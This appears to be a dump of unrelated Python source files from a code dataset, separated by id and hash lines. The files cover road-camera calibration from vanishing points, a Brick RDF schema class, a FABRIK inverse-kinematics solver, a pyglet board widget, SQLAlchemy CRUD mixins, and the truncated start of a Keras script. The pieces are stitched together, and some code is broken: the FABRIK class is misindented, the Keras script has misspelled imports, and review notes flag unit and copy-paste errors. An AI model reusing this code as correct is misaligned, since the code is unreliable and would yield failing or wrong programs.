        # one_point=True -> one-vanishing-point method needing a known
        # vehicle length l and its front/back image rows vf/vb;
        # otherwise the two-vanishing-point method is used.
        self.one_point = one_point
        self.p1 = kwargs['p1']
        self.p2 = kwargs['p2']
        self.p3 = kwargs['p3']
        self.p4 = kwargs['p4']
        self.u2 = kwargs['u2']
        self.u3 = kwargs['u3']
        # Recenter all image measurements about the principal point.
        self.p1 = (self.p1[0] - self.shift_x, self.p1[1] - self.shift_y)
        self.p2 = (self.p2[0] - self.shift_x, self.p2[1] - self.shift_y)
        self.p3 = (self.p3[0] - self.shift_x, self.p3[1] - self.shift_y)
        self.p4 = (self.p4[0] - self.shift_x, self.p4[1] - self.shift_y)
        self.u2 = self.u2 - self.shift_x
        self.u3 = self.u3 - self.shift_x
        # Known real-world lane width (same unit as l).
        self.w = kwargs['w']
        if self.one_point:
            # vb/vf: image rows of the vehicle's back and front;
            # l: the vehicle's known real-world length.
            self.vb = kwargs['vb']
            self.vf = kwargs['vf']
            self.vb = self.vb - self.shift_y
            self.vf = self.vf - self.shift_y
            self.l = kwargs['l']
        # First (road-direction) vanishing point, always required.
        self.u0, self.v0 = self.__compute_1st_vanishing_points()
        if not self.one_point:
            # Second vanishing point (perpendicular direction) lies on the
            # horizon; only needed for the two-point method.
            self.u1 = self.__compute_2nd_vanishing_points()

    def __compute_1st_vanishing_points(self):
        # Intersect the two road-direction lines (p1-p2 and p3-p4).
        road_l1 = Line(Point(self.p1), Point(self.p2))
        road_l2 = Line(Point(self.p3), Point(self.p4))
        road_intersection = intersection(road_l1, road_l2)
        # sympy returns exact values; cast to float for the numeric math.
        u0 = float(road_intersection[0][0])
        v0 = float(road_intersection[0][1])
        return u0, v0

    def __compute_2nd_vanishing_points(self):
        # Intersect a perpendicular-direction line with the p2-p3 line.
        # NOTE(review): the commented-out variants intersect p2-p3 with the
        # horizontal line v = v0 instead -- confirm which pairing matches
        # the marked points before changing.
        # perp_l1 = Line(Point(self.p2), Point(self.p3))
        perp_l1 = Line(Point(self.p1), Point(self.p4))
        # horizon_l = Line(Point(0, self.v0), (1, self.v0))
        horizon_l = Line(Point(self.p2), Point(self.p3))
        perp_intersection = intersection(perp_l1, horizon_l)
        u1 = float(perp_intersection[0][0])
        return u1

    def calibration(self, save=True):
        """Compute focal length f, tilt phi, pan theta and camera height h.

        Each output is a list because the one-point method's quadratic in
        f**2 can yield two admissible solutions.  Optionally dumps the
        result to cc_parameter.yaml next to this file.
        """
        # Pixel separation of the two lane-edge columns.
        delta = self.u3 - self.u2
        if not self.one_point:
            # Two-vanishing-point formula: f = sqrt(-(v0^2 + u0*u1)).
            fs = [np.sqrt(-(self.v0**2 + self.u0 * self.u1))]
        else:
            # One-point method: solve f^2*2 + B*f^2 + C = 0 built from the
            # known vehicle length l and lane width w (see Schoepflin &
            # Dailey 2003).
            k = (self.vf - self.v0) * (self.vb - self.v0) / (self.vf - self.vb)
            k_v = delta * k * self.l / (self.w * self.v0)
            B = 2 * (self.u0**2 + self.v0**2) - k_v**2
            C = (self.u0**2 + self.v0**2)**2 - k_v**2 * self.v0**2
            # print('delta', delta)
            # print('k', k)
            # print('k_v', k_v)
            # print('u0', self.u0)
            # print('v0', self.v0)
            # print('B', B)
            # print('C', C)
            # Quadratic in f^2; keep the second root only when physical
            # (non-negative).
            f_square_0 = (-B + np.sqrt(B**2 - 4 * C)) / 2
            f_square_1 = (-B - np.sqrt(B**2 - 4 * C)) / 2
            fs = [np.sqrt(f_square_0)]
            if f_square_1 >= 0:
                fs.append(np.sqrt(f_square_1))
        phis = []
        thetas = []
        hs = []
        for f in fs:
            # Tilt from the road vanishing point's row, pan from its column,
            # height from the known lane width.
            phi = np.arctan(-self.v0 / f)
            theta = np.arctan(-self.u0 * np.cos(phi) / f)
            h = f * self.w * np.sin(phi) / (np.abs(delta) * np.cos(theta))
            phis.append(phi)
            thetas.append(theta)
            hs.append(h)
        cc_parameter = {
            "f" : [float(f) for f in fs],
            "phi": [float(phi) for phi in phis],
            "theta": [float(theta) for theta in thetas],
            "h": [float(h) for h in hs],
        }
        if save:
            # Persist beside this module so downstream tools can find it.
            with open(os.path.join(dirname(realpath(__file__)),"cc_parameter.yaml"), 'w') as f_cc_parameter:
                f_cc_parameter.write(yaml.dump(cc_parameter))
        return cc_parameter
|
991,279 | 15c4afb7835dfb0bf9dc467aad5a451a86d45543 | from rdflib import Namespace, Graph, Literal, RDF, URIRef
from rdfalchemy.rdfSubject import rdfSubject
from rdfalchemy import rdfSingle, rdfMultiple, rdfList
from brick.brickschema.org.schema._1_0_2.Brick.AHU_Discharge_Air_Temperature_Cooling_Setpoint import AHU_Discharge_Air_Temperature_Cooling_Setpoint
from brick.brickschema.org.schema._1_0_2.Brick.Cooling_Supply_Air_Temperature_Proportional_Band_Setpoint import Cooling_Supply_Air_Temperature_Proportional_Band_Setpoint
from brick.brickschema.org.schema._1_0_2.Brick.AHU_Supply_Air_Temperature_Cooling_Setpoint import AHU_Supply_Air_Temperature_Cooling_Setpoint
from brick.brickschema.org.schema._1_0_2.Brick.Cooling_Discharge_Air_Temperature_Proportional_Band_Setpoint import Cooling_Discharge_Air_Temperature_Proportional_Band_Setpoint
class AHU_Cooling_Supply_Air_Temperature_Proportional_Band_Setpoint(AHU_Discharge_Air_Temperature_Cooling_Setpoint,Cooling_Supply_Air_Temperature_Proportional_Band_Setpoint,AHU_Supply_Air_Temperature_Cooling_Setpoint,Cooling_Discharge_Air_Temperature_Proportional_Band_Setpoint):
    """Auto-generated RDFAlchemy mapping for a Brick 1.0.2 point class.

    Multiple inheritance mirrors the Brick tagset lattice; the body only
    pins the rdf:type URI used when instances are serialized to RDF.
    """
    rdf_type = Namespace('https://brickschema.org/schema/1.0.2/Brick#').AHU_Cooling_Supply_Air_Temperature_Proportional_Band_Setpoint
|
991,280 | 6714e9ff514d251f7723971c6dca8cde95499ed6 | from fabrik_chain_3d import Bone as Bone, Joint as Joint, Mat as Mat, Utils as Util
import math
import numpy as np
class FABRIK():
def __init__(self, chain_length, target_position, target_orientation,is_base_bone_fixed,base_bone_constraint_uv,fixed_base_location):
    """FABRIK solver state for a single bone chain.

    chain_length: number of bones in the chain.
    target_position / target_orientation: end-effector goal (position and
        quaternion orientation).
    is_base_bone_fixed / base_bone_constraint_uv / fixed_base_location:
        base-bone anchoring configuration.
    """
    self.target_position = target_position
    self.target_orientation = target_orientation
    self.chain_length = chain_length
    # Twist limit per bone, converted from radians to degrees
    # (2.8973 rad -- presumably a hardware joint limit; TODO confirm).
    self.bone_twist_limit = 2.8973 * 180 / math.pi
    # This array store the rotations of ball or hinge joints
    self.deg = [0] * chain_length
    # This array store the rotations of a bone around its own; the last one belongs to the base bone which is fixed!
    self.rotations = [0] * (chain_length+1)
    self.fixed_base_location = fixed_base_location
    self.fixed_base_location_2 = [0, 0, 0]
    self.is_base_bone_fixed = is_base_bone_fixed
    self.base_bone_constraint_uv = base_bone_constraint_uv
def solve_for_rotations(self, outer_joint_orientation, inner_joint_orientation, bone_number):
    """Twist-limit the rotation between two joint orientation quaternions.

    Records the (possibly clamped) twist angle in self.rotations[bone_number]
    (radians) and returns the resulting orientation quaternion [w, x, y, z].
    """
    q1 = outer_joint_orientation
    q2 = inner_joint_orientation
    # finding the rotor that express rotation between two orientational frame(between outer and inner joint)
    rotor = Util.Utils().find_rotation_quaternion(q1, q2)
    # Clamp w into acos's domain.  NOTE(review): clamping to +/-0.99
    # instead of +/-1.0 introduces a small angle error near identity.
    if rotor[0] > 1:
        rotor[0] = 0.99
    if rotor[0] < -1:
        rotor[0] = -0.99
    # Rotation angle encoded by the rotor: 2*acos(w), in degrees.
    needed_rotation = math.acos(rotor[0]) * 2 * (180 / np.pi)
    self.rotations[bone_number] = needed_rotation * (np.pi / 180)
    if needed_rotation <= self.bone_twist_limit:
        # if the rotation is inside the limited
        return Mat.Mat().multiply_two_quaternion(rotor, outer_joint_orientation)
    else:
        # the maximum allowed rotation angle
        theta = (self.bone_twist_limit) * (np.pi / 180)
        self.rotations[bone_number] = theta
        # the rotation axis
        if abs(rotor[0]) == 1:
            # Degenerate rotor (no well-defined axis): return it unchanged.
            return rotor
        # Unit rotation axis recovered from the vector part of the rotor.
        v1 = np.dot(rotor[1:], (1 / math.sqrt(1 - rotor[0] ** 2)))
        # Rebuild a quaternion with the same axis but the clamped angle.
        w = math.cos(theta / 2)
        x = v1[0] * math.sin(theta / 2)
        y = v1[1] * math.sin(theta / 2)
        z = v1[2] * math.sin(theta / 2)
        return [w, x, y, z]
def forward(self,chain):
    """FABRIK forward pass: walk the chain from end effector to base.

    Pins the end effector to the target, then repositions each bone's
    start point inward while honouring joint constraints (BALL,
    GLOBAL_HINGE, LOCAL_HINGE) and twist limits.  Mutates and returns
    ``chain``.
    """
    for loop in range(self.chain_length - 1, -1, -1):
        # Get the length of the bone we're working on
        this_bone = chain.get_bone(loop)
        this_bone_length = this_bone.get_length()
        this_bone_joint = this_bone.get_joint()
        this_bone_joint_type = this_bone_joint.get_joint_type()
        # If we are NOT working on the end effector bone
        if loop != (self.chain_length - 1):
            if this_bone.is_fix_bone() == 1:
                this_bone_outer_to_inner_uv = Util.Utils().negated(this_bone.get_fixed_bone_direction_uv())
            else:
                # Get the outer-to-inner unit vector of the bone further out
                outer_bone_outer_to_inner_uv = Util.Utils().negated(
                    chain.get_bone(loop+1).get_direction_uv())
                # Get the outer-to-inner unit vector of this bone
                this_bone_outer_to_inner_uv = Util.Utils().negated(
                    chain.get_bone(loop).get_direction_uv())
            next_bone_orientation = chain.get_bone(loop+1).get_bone_orientation()
            # NOTE(review): this also reads bone loop+1 -- a likely
            # copy-paste slip; chain.get_bone(loop) was probably intended.
            this_bone_orientation = chain.get_bone(loop+1).get_bone_orientation()
            this_bone.set_bone_orientation(
                self.solve_for_rotations(next_bone_orientation, this_bone_orientation, loop))
            # Get the joint type for this bone and handle constraints on thisBoneOuterToInnerUV
            if this_bone_joint_type == "BALL":
                # Constrain to relative angle between this bone and the outer bone if required
                angle_between_degs = Util.Utils().get_angle_between_degs(outer_bone_outer_to_inner_uv,
                                                                         this_bone_outer_to_inner_uv)
                constrain_angle_degs = this_bone_joint.get_ball_joint_constraint_degs()
                if angle_between_degs > constrain_angle_degs:
                    this_bone_outer_to_inner_uv = Util.Utils().get_angle_limited_uv(this_bone_outer_to_inner_uv,
                                                                                    outer_bone_outer_to_inner_uv,
                                                                                    constrain_angle_degs)
            elif this_bone_joint_type == "GLOBAL_HINGE":
                # Project this bone outer-to-inner direction onto the hinge rotation axis
                this_bone_outer_to_inner_uv = Util.Utils().project_on_to_plane(this_bone_outer_to_inner_uv,
                                                                               this_bone_joint.get_hinge_rotation_axis())
            elif this_bone_joint_type == "LOCAL_HINGE":
                # Not a base bone? Then construct a rotation matrix based on the previous bones
                # inner-to-outer direction...
                if loop > 0:
                    m = Util.Utils().create_rotation_matrix(chain.get_bone(loop-1).get_direction_uv())
                    relative_hinge_rotation_axis = Util.Utils().normalization(
                        Util.Utils().times(m, this_bone_joint.get_hinge_rotation_axis()))
                    # transform the hinge rotation axis into the previous bones frame of reference.
                    # Project this bone's outer-to-inner direction onto the plane described by the relative hinge rotation axis
                    this_bone_outer_to_inner_uv = Util.Utils().project_on_to_plane(this_bone_outer_to_inner_uv,
                                                                                   relative_hinge_rotation_axis)
                else:
                    raise Exception("The base bone joint can't be LOCAL HINGE")
            # Slide this bone's start point inward along the constrained direction.
            scale = [i * this_bone_length for i in this_bone_outer_to_inner_uv]
            end_location = this_bone.get_end_point_position()
            new_start_location = [x + y for x, y in zip(end_location, scale)]
            this_bone.set_start_point_position(new_start_location)
            # If we are not working on the basebone, then we also set the end joint location of
            # the previous bone in the chain
            if loop > 0:
                chain.get_bone(loop-1).set_end_point_position(new_start_location)
        # If we ARE working on the end effector bone..
        else:
            # put end effector end location to the target
            this_bone.set_end_point_position(self.target_position)
            this_bone.set_bone_orientation(
                self.solve_for_rotations(self.target_orientation, this_bone.get_bone_orientation(), loop))
            if this_bone.is_fix_bone() == 1:
                this_bone_outer_to_inner_uv = Util.Utils().negated(this_bone.get_fixed_bone_direction_uv())
            else:
                this_bone_outer_to_inner_uv = Util.Utils().negated(this_bone.get_direction_uv())
            if this_bone_joint_type == "BALL":
                # Ball joints are unconstrained at the end effector.
                i = 0
            elif this_bone_joint_type == "GLOBAL_HINGE":
                this_bone_outer_to_inner_uv = Util.Utils().project_on_to_plane(this_bone_outer_to_inner_uv,
                                                                               this_bone_joint.get_hinge_rotation_axis())
            elif this_bone_joint_type == "LOCAL_HINGE":
                # NOTE(review): no loop > 0 guard here -- a single-bone chain
                # with a LOCAL_HINGE end effector would index bone -1.
                m = Util.Utils().create_rotation_matrix(chain.get_bone(loop-1).get_direction_uv())
                relative_hinge_rotation_axis = Util.Utils().normalization(
                    Util.Utils().times(m, this_bone_joint.get_hinge_rotation_axis()))
                # Project this bone's outer-to-inner direction onto the plane described by the relative hinge
                # rotation axis
                this_bone_outer_to_inner_uv = Util.Utils().project_on_to_plane(this_bone_outer_to_inner_uv,
                                                                               relative_hinge_rotation_axis)
            scale = [i * this_bone_length for i in this_bone_outer_to_inner_uv]
            end_location = this_bone.get_end_point_position()
            new_start_location = [x + y for x, y in zip(end_location, scale)]
            this_bone.set_start_point_position(new_start_location)
            # If we are not working on the base bone, then we also set the end joint location of
            # the previous bone in the chain
            if loop > 0:
                chain.get_bone(loop-1).set_end_point_position(new_start_location)
    return chain
    def backward(self,chain):
        """Second FABRIK half-pass: re-anchor the chain at the fixed base and
        rebuild every bone position outward (loop 0 -> tip).

        For each non-base bone the inner-to-outer direction is constrained by
        its joint type (BALL / GLOBAL_HINGE / LOCAL_HINGE) before the new end
        point is computed; the base bone is pinned to
        ``self.fixed_base_location``. Joint angles are recorded in
        ``self.deg``. Returns the updated *chain*.
        """
        for loop in range(self.chain_length):
            this_bone = chain.get_bone(loop)
            this_bone_length = chain.get_bone(loop).get_length()
            # If we are not working on the base bone
            if loop != 0:
                # Fixed bones keep their preset direction; others use current geometry.
                if this_bone.is_fix_bone() == 1:
                    this_bone_inner_to_outer_uv = this_bone.get_fixed_bone_direction_uv()
                else:
                    this_bone_inner_to_outer_uv = this_bone.get_direction_uv()
                prev_bone_inner_to_outer_uv = chain.get_bone(loop-1).get_direction_uv()
                this_bone_joint = this_bone.get_joint()
                this_bone_joint_type = this_bone_joint.get_joint_type()
                if this_bone_joint_type == "BALL":
                    # Clamp the angle between consecutive bones to the ball-joint limit.
                    angle_between_degs = Util.Utils().get_angle_between_degs(prev_bone_inner_to_outer_uv,
                                                                             this_bone_inner_to_outer_uv)
                    constraint_angle_degs = this_bone_joint.get_ball_joint_constraint_degs()
                    # NOTE(review): stored in plain degrees here, while every other
                    # self.deg[] write in this method converts to radians
                    # (* math.pi / 180) -- confirm which unit is intended.
                    self.deg[loop] = angle_between_degs
                    if angle_between_degs > constraint_angle_degs:
                        this_bone_inner_to_outer_uv = Util.Utils().get_angle_limited_uv(this_bone_inner_to_outer_uv,
                                                                                        prev_bone_inner_to_outer_uv,
                                                                                        constraint_angle_degs)
                        # NOTE(review): also missing the radian conversion used elsewhere.
                        self.deg[loop] = constraint_angle_degs
                elif this_bone_joint_type == "GLOBAL_HINGE":
                    # Get the hinge rotation axis and project our inner-to-outer UV onto it
                    this_bone_inner_to_outer_uv = Util.Utils().project_on_to_plane(this_bone_inner_to_outer_uv,
                                                                                   this_bone_joint.get_hinge_rotation_axis())
                    # If there are joint constraints, then we must honour them...
                    cw_constraint_degs = -this_bone_joint.get_hinge_clockwise_constraint_degs()
                    acw_constraint_degs = this_bone_joint.get_hinge_anticlockwise_constraint_degs()
                    # A hinge at +/- MAX_CONSTRAINT_ANGLE_DEGS is freely rotating and skips clamping.
                    if not Util.Utils().approximately_equal(cw_constraint_degs,
                                                            -this_bone_joint.get_MAX_CONSTRAINT_ANGLE_DEGS(),
                                                            0.001) and not Util.Utils().approximately_equal(
                            acw_constraint_degs,
                            this_bone_joint.get_MAX_CONSTRAINT_ANGLE_DEGS(),
                            0.001):
                        hinge_reference_axis = this_bone_joint.get_reference_axis()
                        hinge_rotation_axis = this_bone_joint.get_hinge_rotation_axis()
                        # Get the signed angle (about the hinge rotation axis) between the hinge reference axis and the hinge-rotation aligned bone UV
                        signed_angle_degs = Util.Utils().get_signed_angle_between_degs(hinge_reference_axis,
                                                                                       this_bone_inner_to_outer_uv,
                                                                                       hinge_rotation_axis)
                        self.deg[loop] = signed_angle_degs * math.pi / 180
                        # Make our bone inner-to-outer UV the hinge reference axis rotated by its maximum clockwise or anticlockwise rotation as required
                        if signed_angle_degs > acw_constraint_degs:
                            this_bone_inner_to_outer_uv = Util.Utils().normalization(
                                Mat.Mat().rotate_about_axis(hinge_reference_axis, acw_constraint_degs,
                                                            hinge_rotation_axis))
                            self.deg[loop] = acw_constraint_degs * math.pi / 180
                        elif signed_angle_degs < cw_constraint_degs:
                            this_bone_inner_to_outer_uv = Util.Utils().normalization(
                                Mat.Mat().rotate_about_axis(hinge_reference_axis, cw_constraint_degs,
                                                            hinge_rotation_axis))
                            self.deg[loop] = cw_constraint_degs * math.pi / 180
                elif this_bone_joint_type == "LOCAL_HINGE":
                    # Transform the hinge rotation axis to be relative to the previous bone in the chain
                    hinge_rotation_axis = this_bone_joint.get_hinge_rotation_axis()
                    m = Util.Utils().create_rotation_matrix(prev_bone_inner_to_outer_uv)
                    relative_hinge_rotation_axis = Util.Utils().normalization(
                        Util.Utils().times(m, hinge_rotation_axis))
                    this_bone_inner_to_outer_uv = Util.Utils().project_on_to_plane(this_bone_inner_to_outer_uv,
                                                                                   relative_hinge_rotation_axis)
                    # Constrain rotation about reference axis if required
                    cw_constraint_degs = -this_bone_joint.get_hinge_clockwise_constraint_degs()
                    acw_constraint_degs = this_bone_joint.get_hinge_anticlockwise_constraint_degs()
                    if not Util.Utils().approximately_equal(cw_constraint_degs,
                                                            -this_bone_joint.get_MAX_CONSTRAINT_ANGLE_DEGS(),
                                                            0.001) and not Util.Utils().approximately_equal(
                            acw_constraint_degs,
                            this_bone_joint.get_MAX_CONSTRAINT_ANGLE_DEGS(),
                            0.001):
                        # The reference axis must also be rotated into the previous bone's frame.
                        relative_hinge_reference_axis = Util.Utils().normalization(
                            Util.Utils().times(m, this_bone_joint.get_reference_axis()))
                        signed_angle_degs = Util.Utils().get_signed_angle_between_degs(
                            relative_hinge_reference_axis,
                            this_bone_inner_to_outer_uv,
                            relative_hinge_rotation_axis)
                        self.deg[loop] = signed_angle_degs * math.pi / 180
                        if signed_angle_degs > acw_constraint_degs:
                            this_bone_inner_to_outer_uv = Util.Utils().normalization(
                                Mat.Mat().rotate_about_axis(relative_hinge_reference_axis, acw_constraint_degs,
                                                            relative_hinge_rotation_axis))
                            self.deg[loop] = acw_constraint_degs * math.pi / 180
                        elif signed_angle_degs < cw_constraint_degs:
                            this_bone_inner_to_outer_uv = Util.Utils().normalization(
                                Mat.Mat().rotate_about_axis(relative_hinge_reference_axis, cw_constraint_degs,
                                                            relative_hinge_rotation_axis))
                            self.deg[loop] = cw_constraint_degs * math.pi / 180
                # twisted = np.cross(this_bone_inner_to_outer_uv,relative_hinge_rotation_axis)
                # print("bone"+str(loop))
                # print(twisted)
                # Place this bone's end one bone-length along the constrained direction,
                # and propagate the new point to the next bone's start.
                scale = [i * this_bone_length for i in this_bone_inner_to_outer_uv]
                start_location = this_bone.get_start_point_position()
                new_end_location = [x + y for x, y in zip(start_location, scale)]
                this_bone.set_end_point_position(new_end_location)
                if loop < self.chain_length - 1:
                    chain.get_bone(loop+1).set_start_point_position(new_end_location)
            # If we ARE working on the basebone...
            else:
                # The base bone is always re-anchored at the fixed base location.
                chain.get_bone(0).set_start_point_position(self.fixed_base_location)
                if self.is_base_bone_fixed == 1:
                    chain.get_bone(0).set_end_point_position(self.fixed_base_location_2)
                    if self.chain_length > 1:
                        chain.get_bone(1).set_start_point_position(self.fixed_base_location_2)
                else:
                    this_bone_joint = this_bone.get_joint()
                    this_bone_joint_type = this_bone_joint.get_joint_type()
                    if this_bone_joint_type == "GLOBAL_HINGE":
                        hinge_rotation_axis = this_bone_joint.get_hinge_rotation_axis()
                        cw_constraint_degs = -this_bone_joint.get_hinge_clockwise_constraint_degs()
                        acw_constraint_degs = this_bone_joint.get_hinge_anticlockwise_constraint_degs()
                        this_bone_inner_to_outer_uv = Util.Utils().project_on_to_plane(this_bone.get_direction_uv(),
                                                                                       hinge_rotation_axis)
                        # If we have a global hinge which is not freely rotating then we must constrain about the reference axis
                        if not Util.Utils().approximately_equal(cw_constraint_degs,
                                                                -this_bone_joint.get_MAX_CONSTRAINT_ANGLE_DEGS(),
                                                                0.001) and not Util.Utils().approximately_equal(
                                acw_constraint_degs,
                                this_bone_joint.get_MAX_CONSTRAINT_ANGLE_DEGS(),
                                0.001):
                            hinge_reference_axis = this_bone_joint.get_reference_axis()
                            signed_angle_degs = Util.Utils().get_signed_angle_between_degs(hinge_reference_axis,
                                                                                           this_bone_inner_to_outer_uv,
                                                                                           hinge_rotation_axis)
                            self.deg[loop] = signed_angle_degs * math.pi / 180
                            if signed_angle_degs > acw_constraint_degs:
                                this_bone_inner_to_outer_uv = Util.Utils().normalization(
                                    Mat.Mat().rotate_about_axis(hinge_reference_axis, acw_constraint_degs,
                                                                hinge_rotation_axis))
                                self.deg[loop] = acw_constraint_degs * math.pi / 180
                            elif signed_angle_degs < cw_constraint_degs:
                                this_bone_inner_to_outer_uv = Util.Utils().normalization(
                                    Mat.Mat().rotate_about_axis(hinge_reference_axis, cw_constraint_degs,
                                                                hinge_rotation_axis))
                                self.deg[loop] = cw_constraint_degs * math.pi / 180
                        # twisted = np.cross(this_bone_inner_to_outer_uv, hinge_rotation_axis)
                        # print("bone" + str(loop))
                        # print(twisted)
                        scale = [i * this_bone_length for i in this_bone_inner_to_outer_uv]
                        start_location = this_bone.get_start_point_position()
                        new_end_location = [x + y for x, y in zip(start_location, scale)]
                        this_bone.set_end_point_position(new_end_location)
                        if self.chain_length > 1:
                            chain.get_bone(1).set_start_point_position(new_end_location)
                    # NOTE(review): this is `if`, not `elif` -- after the GLOBAL_HINGE
                    # branch above runs, the trailing `else` below also executes and
                    # re-positions the base bone with the *unconstrained* direction.
                    # Probably intended to be `elif`; confirm before changing.
                    if this_bone_joint_type == "BALL":
                        this_bone_inner_to_outer_uv = this_bone.get_direction_uv()
                        angle_between_degs = Util.Utils().get_angle_between_degs(self.base_bone_constraint_uv,
                                                                                 this_bone_inner_to_outer_uv)
                        # NOTE(review): called on the *bone* here, but on the *joint*
                        # in the non-base BALL branch -- verify the bone delegates
                        # get_ball_joint_constraint_degs() to its joint.
                        constraint_angle_degs = this_bone.get_ball_joint_constraint_degs()
                        self.deg[loop] = angle_between_degs * math.pi / 180
                        if angle_between_degs > constraint_angle_degs:
                            this_bone_inner_to_outer_uv = Util.Utils().get_angle_limited_uv(this_bone_inner_to_outer_uv,
                                                                                            self.base_bone_constraint_uv,
                                                                                            constraint_angle_degs)
                            self.deg[loop] = constraint_angle_degs * math.pi / 180
                        scale = [i * this_bone_length for i in this_bone_inner_to_outer_uv]
                        start_location = this_bone.get_start_point_position()
                        new_end_location = [x + y for x, y in zip(start_location, scale)]
                        this_bone.set_end_point_position(new_end_location)
                        if self.chain_length > 1:
                            chain.get_bone(1).set_start_point_position(new_end_location)
                    else:
                        # Unconstrained base bone: keep its current direction.
                        this_bone_inner_to_outer_uv = this_bone.get_direction_uv()
                        scale = [i * this_bone_length for i in this_bone_inner_to_outer_uv]
                        start_location = this_bone.get_start_point_position()
                        new_end_location = [x + y for x, y in zip(start_location, scale)]
                        this_bone.set_end_point_position(new_end_location)
                        if self.chain_length > 1:
                            chain.get_bone(1).set_start_point_position(new_end_location)
        return chain
        # self.draw_chain()
    def get_rotations(self):
        """Return the stored rotations list.

        NOTE(review): self.rotations is not written anywhere in this chunk --
        presumably populated via solve_for_rotations(); verify elsewhere.
        """
        return self.rotations
    def get_deg(self):
        """Return the per-bone joint angles recorded during the last solve.

        NOTE(review): most writes to self.deg convert to radians
        (* math.pi / 180), but the non-base BALL branch in backward() stores
        plain degrees -- callers should confirm the intended unit.
        """
        return self.deg
991,281 | 2633b298f9424406a1ac82a6c06fe7fc54348252 | from board import Board
import pyglet
class SquareWidget:
    """Renders one lettered tile of the board with pyglet."""

    # Tile size and board offset, in pixels (shared by all tiles).
    widthpx = heightpx = 100
    offsetpx = 40

    def __init__(self, sq):
        """Wrap board square *sq*, caching its grid position and letter."""
        self.square = sq
        self.column = 3 - sq.coord[0]
        self.row = sq.coord[1]
        self.letter = sq.letter

    def draw_square(self, batch):
        """Draw the tile quad, then its letter centred on top."""
        cls = SquareWidget
        center_x = cls.offsetpx + (self.row + .5) * cls.widthpx
        center_y = cls.offsetpx + (self.column + .5) * cls.heightpx
        half_w = cls.widthpx / 2 - 2
        half_h = cls.heightpx / 2 - 2
        corners = (center_x - half_w, center_y - half_h,
                   center_x - half_w, center_y + half_h,
                   center_x + half_w, center_y + half_h,
                   center_x + half_w, center_y - half_h)
        fill = (176, 157, 33) * 4
        quad = pyglet.graphics.vertex_list_indexed(
            4, [0, 1, 2, 3], ('v2f', corners), ('c3B', fill))
        quad.draw(pyglet.gl.GL_QUADS)
        pyglet.text.Label(text=self.letter, font_name='Helvetica',
                          x=center_x, y=center_y, font_size=36, bold=True,
                          anchor_x='center', anchor_y='center',
                          color=(0, 0, 0, 255)).draw()

    def update(self, dt):
        """Squares have no per-frame animation."""
        pass
class BoardWidget:
    """Draws the 4x4 board background and delegates each tile to SquareWidget."""

    # Board dimensions in squares and pixels, plus the window offset.
    width = height = 4
    widthpx = heightpx = 408
    offsetpx = 36

    def __init__(self, game):
        """Build a SquareWidget grid mirroring *game*'s squares.

        Expects *game* to expose ``width``, ``height`` and ``getSquare(i, j)``.
        (Removed the leftover ``print(self.game)`` debug statement.)
        """
        self.game = game
        self.board = []
        for i in range(self.game.width):
            row = []
            for j in range(self.game.height):
                row += [SquareWidget(self.game.getSquare(i, j))]
            self.board += [row]

    def draw_board(self, batch):
        """Draw the green board background, then every square on top of it."""
        coords = (BoardWidget.offsetpx, BoardWidget.offsetpx,
                  BoardWidget.offsetpx + BoardWidget.widthpx, BoardWidget.offsetpx,
                  BoardWidget.offsetpx + BoardWidget.widthpx, BoardWidget.offsetpx + BoardWidget.heightpx,
                  BoardWidget.offsetpx, BoardWidget.offsetpx + BoardWidget.heightpx)
        colors = (39, 156, 58) * 4
        vertex_list = pyglet.graphics.vertex_list_indexed(4, [0, 1, 2, 3],
                                                          ('v2f', coords), ('c3B', colors))
        vertex_list.draw(pyglet.gl.GL_QUADS)
        for i in range(BoardWidget.width):
            for j in range(BoardWidget.height):
                self.getSquare(i, j).draw_square(batch)

    def getSquare(self, row, column):
        """Return the widget at (row, column), or None when out of range."""
        try:
            return self.board[row][column]
        except IndexError:
            # BUG FIX: the original `return null` raised NameError --
            # Python's null value is None.
            print("IndexError")
            return None

    def update(self, dt):
        """No per-frame board animation."""
        pass
|
991,282 | 25349f6c9b1baa4211209c86da2e05a525d59260 |
"""Database module, including the SQLAlchemy database object and DB-related utilities."""
from myapp.extensions import db
from sqlalchemy.inspection import inspect
# Serialization mixin. The serialization function basically fetches all attributes the SQLAlchemy inspector
# exposes and puts it in a dict. Another option could be to implement marshmallow library
class Serializer(object):
    """Serialization mixin: converts SQLAlchemy models to plain dicts using
    the attributes exposed by the SQLAlchemy inspector."""

    def serialize(self):
        """Return a dict mapping each inspected attribute name to its value."""
        data = {}
        for prop in inspect(self).attrs.keys():
            data[prop] = getattr(self, prop)
        return data

    @staticmethod
    def serialize_list(l):
        """Serialize each model in *l*, returning a list of dicts."""
        return [item.serialize() for item in l]
class CRUDMixin(Serializer):
    """Mixin that adds convenience methods for CRUD (create, read, update, delete) operations."""

    @classmethod
    def create(cls, **kwargs):
        """Create a new record, save it to the database, and return its
        serialized dict representation."""
        instance = cls(**kwargs)
        return instance.save().serialize()

    def update(self, commit=True, **kwargs):
        """Update specific fields of a record; commits when *commit* is true.

        Returns self (save() is fluent).
        """
        for attr, value in kwargs.items():
            setattr(self, attr, value)
        # FIX: the original `commit and self.save() or self` and/or chain only
        # worked because save() happens to return a truthy value; state the
        # intent explicitly and safely.
        return self.save() if commit else self

    def save(self, commit=True):
        """Add the record to the session and optionally commit. Returns self."""
        db.session.add(self)
        if commit:
            db.session.commit()
        return self

    def delete(self, commit=True):
        """Remove the record from the database. Returns self."""
        db.session.delete(self)
        if commit:
            db.session.commit()
        return self
class Model(CRUDMixin, db.Model):
    """Base model class that includes CRUD convenience methods."""

    # Abstract base: SQLAlchemy creates no table for this class; concrete
    # application models inherit from it.
    __abstract__ = True
|
991,283 | 2541f2ae9c56515bd68ed70ca50b7f731657e4b2 | # -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
from __future__ import print_function
import keras
from keras.application.vgg16 import VGG16
from keras.models import Sequential , Model
from keras.layers.core import Dense, Activation, Dropout
from keras.layers import Conv2D, MaxPooling2D, Flatten
from keras import losses
from keras.preprocessing import image
import glob
import numpy as np
from keras.utils import np_utils
from sklearn.preprocessing import normalize
from sklearn.cross_validation import train_test_split
from keras.layers import Conv2D, MaxuPooling2D
from keras import backend as K
from keras.preprocessing.image import ImageDataGenerator
from keras.layers.normalization import BatchNormalization
from keras.models import model_from_json
import glob
import cv2
import random
import numpy as np
import matplotlib.pyplot as plt
def load_GE():
    """Load the GE image set and its one-hot labels from disk.

    Returns a (list of normalized image arrays, label matrix) pair. Labels are
    read from labels.txt and one-hot encoded for 2 classes.
    """
    C1files = glob.glob(r'''D:\TUT\aspl\4\files\*.jpg''' )
